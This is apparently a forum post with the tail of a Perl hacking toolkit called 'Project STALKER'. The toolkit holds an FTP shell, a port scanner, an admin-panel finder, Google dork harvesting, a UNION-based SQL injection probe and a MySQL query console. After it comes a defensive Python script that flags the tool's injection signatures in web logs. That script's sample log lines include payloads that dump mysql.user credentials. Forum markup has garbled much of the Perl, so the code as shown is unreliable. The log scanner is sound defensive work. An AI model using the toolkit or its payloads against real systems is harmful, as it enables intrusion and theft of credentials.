    836. if (my $socket = Net::FTP->new($ftp)) {
    837. if ($socket->login($user,$pass)) {
    838.  
    839. print "\n</li><li type="square"> Enter of the server FTP\n\n";[/li][/list]
    840.  
    841. menu:
    842.  
    843. print "\n\nftp>";
    844. chomp (my $cmd = <stdin>);
    845. print "\n\n";
    846.  
    847. if ($cmd=~/help/) {
    848. print q(
    849.  
    850. help : show information
    851. cd : change directory <dir>
    852. dir : list a directory
    853. mdkdir : create a directory <dir>
    854. rmdir : delete a directory <dir>
    855. pwd : directory  
    856. del : delete a file <file>
    857. rename : change name of the a file <file1> <file2>
    858. size : size of the a file <file>
    859. put : upload a file <file>
    860. get : download a file <file>
    861. cdup : change dir <dir>
    862. exit : ??
    863.  
    864.  
    865. );
    866. }
    867.  
    868. if ($cmd=~/dir/ig) {
    869. if (my @files = $socket->dir()) {
    870. for(@files) {
    871. print "</li><li type="square"> ".$_."\n";[/li][/list]
    872. }
    873. } else {
    874. print "\n\n[-] Error\n\n";
    875. }
    876. }
    877.  
    878. if ($cmd=~/pwd/ig) {
    879. print "</li><li type="square"> Path : ".$socket->pwd()."\n";[/li][/list]
    880. }
    881.  
    882. if ($cmd=~/cd (.*)/ig) {
    883. if ($socket->cwd($1)) {
    884. print "</li><li type="square"> Directory changed\n";[/li][/list]
    885. } else {
    886. print "\n\n[-] Error\n\n";
    887. }
    888. }
    889.  
    890. if ($cmd=~/cdup/ig) {
    891. if (my $dir = $socket->cdup()) {
    892. print "\n\n</li><li type="square"> Directory changed\n\n";[/li][/list]
    893. } else {
    894. print "\n\n[-] Error\n\n";
    895. }
    896. }
    897.  
    898. if ($cmd=~/del (.*)/ig) {
    899. if ($socket->delete($1)) {
    900. print "</li><li type="square"> File deleted\n";[/li][/list]
    901. } else {
    902. print "\n\n[-] Error\n\n";
    903. }
    904. }
    905.  
    906. if ($cmd=~/rename (.*) (.*)/ig) {
    907. if ($socket->rename($1,$2)) {
    908. print "</li><li type="square"> File Updated\n";[/li][/list]
    909. } else {
    910. print "\n\n[-] Error\n\n";
    911. }
    912. }
    913.  
    914. if ($cmd=~/mkdir (.*)/ig) {
    915. if ($socket->mkdir($1)) {
    916. print "\n\n</li><li type="square"> Directory created\n";[/li][/list]
    917. } else {
    918. print "\n\n[-] Error\n\n";
    919. }
    920. }
    921.  
    922. if ($cmd=~/rmdir (.*)/ig) {
    923. if ($socket->rmdir($1)) {
    924. print "\n\n</li><li type="square"> Directory deleted\n"; [/li][/list]
    925. } else {
    926. print "\n\n[-] Error\n\n";
    927. }
    928. }
    929.  
    930. if ($cmd=~/exit/ig) {
    931. next;
    932. }
    933.  
    934. if ($cmd=~/get (.*) (.*)/ig) {
    935. print "\n\n</li><li type="square"> Downloading file\n\n";[/li][/list]
    936. if ($socket->get($1,$2)) {
    937. print "</li><li type="square"> Download completed";[/li][/list]
    938. } else {
    939. print "\n\n[-] Error\n\n";
    940. }
    941. }
    942.  
    943. if ($cmd=~/put (.*) (.*)/ig) {
    944. print "\n\n</li><li type="square"> Uploading file\n\n";[/li][/list]
    945. if ($socket->put($1,$2)) {
    946. print "</li><li type="square"> Upload completed";[/li][/list]
    947. } else {
    948. print "\n\n[-] Error\n\n";
    949. }
    950. }
    951.  
    952. if ($cmd=~/quit/) {
    953. next;
    954. }
    955.  
    956. goto menu;
    957.  
    958. } else {
    959. print "\n[-] Failed the login\n\n";
    960. }
    961.  
    962. } else {
    963. print "\n\n[-] Error\n\n";
    964. }
    965.  
    966.  
    967.  
    968. }
    969.  
    970.  
    971. sub scanpaths {
    972.  
    973. my $urla = $_[0];
    974.  
    975. print "\n</li><li type="square"> Find paths in $urla\n\n\n";[/li][/list]
    976. my @urls = repes(get_links(toma($urla)));
    977. for $url(@urls) {
    978. my $web = $url;
    979. my ($scheme, $auth, $path, $query, $frag)  = uri_split($url);
    980. if ($_[0] =~/$auth/ or $auth eq "") {
    981. if ($path=~/(.*)\/(.*)\.(.*)$/) {
    982. my $borrar = $2.".".$3;
    983. if ($web=~/(.*)$borrar/) {
    984. my $co = $1;
    985. unless ($co=~/$auth/) {
    986. $co = $urla.$co;
    987. }
    988. $code = toma($co);
    989. if ($code=~/Index Of/ig) {
    990. print "[Link] : ".$co."\n";
    991. saveyes("logs/paths-found.txt",$co);
    992. }}}}}
    993. print "\n\n</li><li type="square"> Finish\n";[/li][/list]
    994. }
    995.  
    996.  
    997. sub scanport {
    998.  
    999. my %ports = ("21"=>"ftp",
    1000. "22"=>"ssh",
    1001. "25"=>"smtp",
    1002. "80"=>"http",
    1003. "110"=>"pop3",
    1004. "3306"=>"mysql"
    1005. );
    1006.  
    1007.  
    1008. print "</li><li type="square"> Scanning $_[0]\n\n\n";[/li][/list]
    1009.  
    1010. for my $port(keys %ports) {
    1011.  
    1012. if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout  => 0.5)) {
    1013. print "[Port] : ".$port." [Service] : ".$ports{$port}."\n";
    1014. }
    1015. }
    1016. print "\n\n</li><li type="square"> Finish\n";[/li][/list]
    1017. }
    1018.  
    1019.  
    1020. sub scanpanel {
    1021. print "</li><li type="square"> Scanning $_[0]\n\n\n";[/li][/list]
    1022. for $path(@panels) {
    1023. $code = tomax($_[0]."/".$path);
    1024. if ($code->is_success) {
    1025. print "[Link] : ".$_[0]."/".$path."\n";
    1026. saveyes("logs/panel-logs.txt",$_[0]."/".$path);
    1027. }
    1028. }
    1029. print "\n\n</li><li type="square"> Finish\n";[/li][/list]
    1030. }
    1031.  
    1032. sub google {
    1033. my($a,$b) = @_;
    1034. for ($pages=10;$pages<=$b;$pages=$pages+10) {
    1035. $code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
    1036. my @links = get_links($code);
    1037. for my $l(@links) {
    1038. if ($l =~/webcache.googleusercontent.com/) {
    1039. push(@url,$l);
    1040. }
    1041. }
    1042. }
    1043.  
    1044. for(@url) {
    1045. if ($_ =~/cache:(.*?)<img src="https://underc0de.org/foro/Smileys/default/sad.gif" alt="&#58;&#40;" title="Triste" class="smiley" />.*?)\+/) {
    1046. push(@founds,$2);
    1047. }
    1048. }
    1049.  
    1050. my @founds = repes(@founds);
    1051.  
    1052. return @founds;
    1053. }
    1054.  
    1055.  
    1056. sub sql {
    1057.  
    1058. my ($pass1,$pass2) = ("+","--");
    1059. my $page = shift;
    1060. $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
    1061. if ($code1=~/The used SELECT statements have a different number of columns/ig) {
    1062. print "</li><li type="square"> SQLI : $page\a\n";[/li][/list]
    1063. saveyes("logs/sql-logs.txt",$page);
    1064. }}
    1065.  
    1066. sub get_links {
    1067.  
    1068. my $test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
    1069. return @links;
    1070.  
    1071. sub agarrar {
    1072. my ($a,%b) = @_;
    1073. push(@links,values %b);
    1074. }
    1075.  
    1076. }
    1077.  
    1078. sub repes {
    1079. foreach $test(@_) {
    1080. push @limpio,$test unless $repe{$test}++;
    1081. }
    1082. return @limpio;
    1083. }
    1084.  
    1085. sub head {
    1086. cprint "\x0311"; #13
    1087. print "\n\n-- == Project STALKER == --\n\n";
    1088. cprint "\x030";
    1089. }
    1090.  
    1091. sub copyright {
    1092. cprint "\x0311"; #13
    1093. print"\n\n(C) Doddy Hackman 2011\n\n";
    1094. cprint "\x030";
    1095. }
    1096.  
    1097. sub toma {
    1098. return $nave->get($_[0])->content;
    1099. }
    1100.  
    1101. sub tomax {
    1102. return $nave->get($_[0]);
    1103. }
    1104.  
    1105. sub tomar {
    1106. my ($web,$var) = @_;
    1107. return $nave->post($web,[%{$var}])->content;
    1108. }
    1109.  
    1110.  
    1111. sub conectar {
    1112.  
    1113. my $sockex = new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $_[1],
    1114. Proto => "tcp",Timeout  => 5);
    1115.  
    1116. print $sockex $_[2]."\r\n";
    1117. $sockex->read($re,5000);
    1118. $sockex->close;
    1119. return $re."\r\n";
    1120. }
    1121.  
    1122.  
    1123. sub enter {
    1124.  
    1125. my ($host,$user,$pass) = @_;
    1126.  
    1127. print "</li><li type="square"> Connecting to the server\n";[/li][/list]
    1128.  
    1129. $info = "dbi:mysql::".$host.":3306";
    1130. if (my $enter = DBI->connect($info,$user,$pass,{PrintError=>0})) {
    1131.  
    1132. print "\n</li><li type="square"> Enter in the database";[/li][/list]
    1133.  
    1134. while(1) {
    1135. print "\n\n\n</li><li type="square"> Query : ";[/li][/list]
    1136. chomp(my $ac = <stdin>);
    1137.  
    1138. if ($ac eq "exit") {
    1139. $enter->disconnect;
    1140. print "\n\n</li><li type="square"> Closing connection\n\n";[/li][/list]
    1141. last;
    1142. }
    1143.  
    1144. $re = $enter->prepare($ac);
    1145. $re->execute();
    1146. my $total = $re->rows();
    1147.  
    1148. my @columnas = @{$re->{NAME}};
    1149.  
    1150. if ($total eq "-1") {
    1151. print "\n\n[-] Query Error\n";
    1152. next;
    1153. } else {
    1154. print "\n\n</li><li type="square"> Result of the query\n";[/li][/list]
    1155. if ($total eq 0) {
    1156. print "\n\n</li><li type="square"> Not rows returned\n\n";[/li][/list]
    1157. } else {
    1158. print "\n\n</li><li type="square"> Rows returned : ".$total."\n\n\n";[/li][/list]
    1159. for(@columnas) {
    1160. print $_."\t\t";
    1161. }
    1162. print "\n\n";
    1163. while (@row = $re->fetchrow_array) {
    1164. for(@row) {
    1165. print $_."\t\t";
    1166. }
    1167. print "\n";
    1168. }}}}
    1169. } else {
    1170. print "\n[-] Error connecting\n";
    1171. }}
    1172.  
    1173. sub saveyes {
    1174. open (SAVE,">>".$_[0]);
    1175. print SAVE $_[1]."\n";
    1176. close SAVE;
    1177. }
    1178.  
    1179. sub savefile {
    1180. open (SAVE,">>logs/webs/".$_[0]);
    1181. print SAVE $_[1]."\n";
    1182. close SAVE;
    1183. }
    1184.  
    1185. sub coleccionar {
    1186. opendir DIR,$_[0];
    1187. my @archivos = readdir DIR;
    1188. close DIR;
    1189. return @archivos;
    1190. }
    1191.  
    1192. sub helpme {
    1193.  
    1194. cprint "\x0310"; #13
    1195.  
    1196. Commands :
    1197.  
    1198.  
    1199. getinfo
    1200. getip <host>
    1201. getlink <page>
    1202. getprocess
    1203. killprocess <name process> <pid process>
    1204. conec <host> <port> <command>  
    1205. allow <host>
    1206. paths <page>
    1207. encodehex <text>
    1208. decodehex <text>
    1209. encodeascii <text>
    1210. decodeascii <text>
    1211. encodebase <text>
    1212. decodebase <text>
    1213. scanport <host>
    1214. panel <page>
    1215. getpass <hash>
    1216. kobra <page>
    1217. ftp <host> <user> <pass>
    1218. mysql <host> <user> <pass>
    1219. navegator
    1220. scangoogle
    1221. help
    1222.  
    1223. );
    1224. cprint "\x030";
    1225. }
    1226.  
    1227. #
    1228. #  The End ?
    1229. #
    1230.  

That's all
« Last modified: March 14, 2015, 10:16:20 am by Expermicid »
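The defender's counterpart to the k0bra/dump routines above, added here as an example (it is not part of BigBear's tool). Every request the tool builds carries a recognisable fingerprint: the `-1 union select 666--` column-count probe, the `ERTOR854` and `RATSXPDOWN` row delimiters (sent either literally, as `char(69,82,...)` or as a `0x...` hex string, the three spellings the tool's `ascii`, `hex_en` and `dump` helpers produce), and the `from mysql.user limit N,1` walk. The scanner below normalises the request target so the `+`, `%20`/`%00` and `/**/` bypass modes from `sub bypass` all collapse to the same text, then matches those signatures. The log lines are constructed in Apache combined format for the example; the IPs and paths are made up.

```python
"""Flag web-server log entries carrying the request signatures that the
Project STALKER SQLi routines emit. Added illustration, not part of the tool."""
from __future__ import annotations
import re
from urllib.parse import unquote_plus

# Row delimiters the tool wraps extracted values in (see sub dump and the
# mysql.user loop above).
MARKERS = ("ERTOR854", "RATSXPDOWN")

# Constructed sample lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [19/Aug/2011:23:30:36 -0300] "GET /news.php?id=-1+union+select+666-- HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [19/Aug/2011:23:30:37 -0300] "GET /news.php?id=-1+union+select+1,unhex(hex(concat(char(69,82,84,79,82,56,53,52),count(username),char(69,82,84,79,82,56,53,52)))),3+from+users-- HTTP/1.1" 200 5300 "-" "Mozilla/5.0"
203.0.113.10 - - [19/Aug/2011:23:30:38 -0300] "GET /news.php?id=-1/**/union/**/select/**/concat(0x524154535850444f574e,host,0x524154535850444f574e,user,0x524154535850444f574e,password,0x524154535850444f574e)/**/from/**/mysql.user/**/limit/**/0,1/* HTTP/1.1" 200 5300 "-" "Mozilla/5.0"
198.51.100.7 - - [19/Aug/2011:23:31:00 -0300] "GET /news.php?id=42 HTTP/1.1" 200 4800 "-" "Mozilla/5.0"
198.51.100.7 - - [19/Aug/2011:23:31:05 -0300] "GET /search.php?q=union+station HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
"""


def char_form(marker: str) -> str:
    """MySQL char() spelling, e.g. ERTOR854 -> char(69,82,84,79,82,56,53,52)."""
    return "char(" + ",".join(str(ord(c)) for c in marker) + ")"


def hex_form(marker: str) -> str:
    """0x-prefixed hex spelling, what the tool's hex_en helper emits."""
    return "0x" + marker.encode().hex()


def normalize(target: str) -> str:
    """URL-decode and turn the tool's comment/NUL separators into spaces so one
    set of patterns covers the '+', '%20' and '/*' bypass modes."""
    s = unquote_plus(target)
    s = re.sub(r"/\*.*?\*/", " ", s)   # /**/ used as whitespace
    s = re.sub(r"/\*", " ", s)         # trailing /* used as comment terminator
    s = s.replace("\x00", " ")         # %00 terminator
    return re.sub(r"\s+", " ", s).lower()


SIGNATURES = [
    ("column-count probe", re.compile(r"union select 666\b")),
    ("mysql.user dump", re.compile(r"\bfrom mysql\.user limit \d+,1")),
] + [
    (f"{m} marker",
     re.compile("|".join(re.escape(x) for x in (m.lower(), char_form(m), hex_form(m)))))
    for m in MARKERS
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_log(text: str) -> list[dict]:
    """Return one record per log line that matches at least one signature."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                    # not a combined-format line; skip
        norm = normalize(m["target"])
        reasons = [name for name, rx in SIGNATURES if rx.search(norm)]
        if reasons:
            hits.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                         "target": m["target"], "reasons": reasons})
    return hits


def hits_by_ip(hits: list[dict]) -> dict[str, int]:
    """Count flagged requests per source address."""
    counts: dict[str, int] = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(f'{h["ip"]} {h["ts"]} {h["status"]} {", ".join(h["reasons"])}\n    {h["target"]}')
    print("per source:", hits_by_ip(found))
```

The normalisation step matters more than the pattern list: matched against the raw target, the `/**/` variant would slip past a naive `union select` rule, and the `char()`/`0x` spellings exist precisely so the delimiter never appears as a readable string on the wire. Note that the benign `q=union+station` line and a plain `id=42` are not flagged; this matches the tool's specific fingerprint, not SQL injection in general.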